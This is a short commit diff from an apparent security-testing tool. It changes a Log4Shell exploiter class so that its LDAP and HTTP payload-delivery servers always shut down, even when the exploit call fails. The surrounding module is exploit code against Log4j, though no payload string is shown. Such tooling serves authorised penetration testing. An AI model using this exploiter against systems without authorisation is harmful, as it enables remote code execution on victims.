Agent: fix log4shell to always close ldap and http servers, even on errors

2022-01-06 12:56:04 +02:00 · 2022-01-06 12:56:04 +02:00 · 7bace927f8
parent 9d5ea0f41f
commit 7bace927f8
1 changed files with 9 additions and 8 deletions
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -69,16 +69,17 @@ class Log4ShellExploiter(WebRCE):
        ldap_thread = ldap.get_run_thread()
        ldap_thread.start()

-        self._trigger_exploit()
+        try:
+            self.exploit(None, None)
+        finally:
+            http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+            http_thread.stop()

-        http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
-        http_thread.stop()
+            java_class_http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+            Log4ShellExploiter.HTTPHandler.stop = True

-        java_class_http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
-        Log4ShellExploiter.HTTPHandler.stop = True
-
-        ldap_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
-        ldap.stop()
+            ldap_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+            ldap.stop()

        # If java class was downloaded it means that victim is vulnerable
        return Log4ShellExploiter.HTTPHandler.class_downloaded